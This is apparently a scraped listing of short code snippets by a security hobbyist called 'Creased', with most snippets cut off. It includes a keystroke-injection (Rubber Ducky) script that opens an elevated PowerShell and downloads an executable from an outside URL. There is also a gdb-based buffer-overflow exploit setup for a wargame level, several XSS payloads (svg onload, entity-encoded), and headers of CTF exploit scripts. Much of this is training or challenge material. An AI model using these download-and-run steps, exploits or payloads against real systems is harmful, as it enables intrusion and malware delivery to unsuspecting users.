Creased

GUI r
DELAY 500
STRING powershell.exe Start-Process powershell.exe -Verb RunAs
ENTER
DELAY 1500
STRING $Payload = Get-Random
ENTER
STRING Start-BitsTransfer -Source https://go.bmoine.fr/mk -Destination C:\$Payload.exe
ENTER
DELAY 1500

Creased

ssh level0@192.168.56.101 # warmup

export TMP=$(mktemp -d)

PATTERN=$(gdb -q -ex 'pattc 250' -ex 'q' | awk -F"'" '{print $2}')
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./level0 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
VDSO=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'vmmap vdso' -ex 'q' | tail -n1 | awk '{print $1}' | grep -Eo '0x[A-Fa-f0-9]+' | sed -r 's/(0x)0/\1/')
MPROTECT=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p mprotect' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+')
READ=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p read' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+')

Creased

#!/usr/bin/env python
# -*-coding:Utf-8 -*

# Magic Packet

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

conf.iface='eth1'

Creased

<div style="display: block; text-align: center; margin: 0 auto;" id="description">
    <a href="https://www.bmoine.fr/" title="Parcours de professionnalisation - Baptiste MOINE" target="_blank">
        <img height="180px" src="https://www.bmoine.fr/assets/images/icon.svg" alt="Logo de Baptiste MOINE">
    </a>
    <p>Bienvenue sur l'instance GitLab de <a href="http://www.bmoine.fr" title="Baptiste MOINE">Baptiste MOINE</a>.</p>
    <p>Sur cette instance, vous trouverez des projets open source sur lesquels je travaille.</p>
    <p>Certains projets peuvent ne pas apparaître sur cette instance, mais vous pouvez trouver l'ensemble de mes projets sur <a title="Suivez mes projets opensource sur GitHub" href="https://github.com/Creased">GitHub</a>, <a title="Suivez mes projets opensource sur GitLab" href="https://gitlab.com/Creased">GitLab</a>, <a title="Suivez mes projets opensource sur Docker Hub" href="https://hub.docker.com/r/creased/">Docker Hub</a>, <a title="Suivez mes projets opensource sur IBM Bluemix" hre

Creased

#!/usr/bin/env python
# -*- coding:Utf-8 -*-

#=====================================#
# [+] Title:   Xivo provd check       #
# [+] Author:  Baptiste M. (Creased)  #
# [+] Website: bmoine.fr              #
# [+] Email:   contact@bmoine.fr      #
# [+] Twitter: @Creased_              #
#=====================================#

Creased

/*!
 * Author: Baptiste MOINE <contact@bmoine.fr>
 * Project: OTP QR-Code Generator
 * Homepage: https://vps.bmoine.fr/totp-qrcode/
 * Released: 17/04/2017
 *
 * Based on http://www.herongyang.com/Encoding/Base32-Encoding-Algorithm.html
 *
 * Base32 encoding process:
 *     0. Get input string + remove carriage return and new line;

Creased

<!DOCTYPE html [
    <!ENTITY lt "<">
    <!ENTITY ob "svg">
    <!ENTITY at "onload">
    <!ENTITY pa "alert">
    <!ENTITY va "1">
    <!ENTITY gt ">">
    <!ENTITY xss "&lt;&ob;/&at;=&pa;(&va;)&gt;">
]>

Creased

"><svg/onload=prompt(1)>

Creased

prompt(1)

Creased

#!/usr/bin/env python
# -*- coding:Utf-8 -*-

#==========================================================#
# [+] Title:   Exploitation code for root-me challenge     #
#              ELF32 - Stack buffer overflow basic 1       #
# [+] Author:  Baptiste M. (Creased)                       #
# [+] Website: bmoine.fr                                   #
# [+] Email:   contact@bmoine.fr                           #
# [+] Twitter: @Creased_                                   #